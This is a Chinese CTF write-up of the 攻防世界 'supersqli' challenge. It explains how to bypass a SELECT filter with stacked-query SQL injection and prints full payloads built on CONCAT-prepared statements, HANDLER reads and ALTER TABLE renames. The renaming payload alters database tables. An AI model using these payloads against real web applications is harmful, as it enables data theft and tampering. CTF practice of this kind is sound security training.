当前位置:网站首页>攻防世界(web篇)---supersqli

攻防世界(web篇)---supersqli

2022-06-12 18:51:00 肖萧然

文章目录

攻防世界(web篇)—supersqli

拿到题目后,发现是单引号报错字符型注入

在这里插入图片描述

order by 2的时候页面正常回显,order by 3的时候页面出错

在这里插入图片描述

接下来union查询,发现被过滤了很多语句

在这里插入图片描述

绕过过滤,下面有几种方法

堆叠查询+预编译

查表

在这里插入图片描述

查字段

在这里插入图片描述

采用预编译的方式查,但被过滤

在这里插入图片描述

strstr区分大小写

?inject=1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare xiao from @sql;EXECUTE xiao;

在这里插入图片描述

handler查询

handler语法

在这里插入图片描述

在这里插入图片描述

查询payload

?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first; --+

在这里插入图片描述

堆叠查询+改表名

原理解析

一开始就是查询word表中的数据,所以我们可以利用数据库修改表名和列名的方法

先把原来的words表名字改成别的,再将1919810931114514表的名字改为words

再将改完名字后的表中的flag字段改为 id (id同样需要show columns from word得到)

然后我们用1’ or 1=1 --+直接就能得到flag

修改payload

?inject=1';alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);

在这里插入图片描述

原网站

版权声明
本文为[肖萧然]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_52549196/article/details/125212118

边栏推荐

猜你喜欢

随机推荐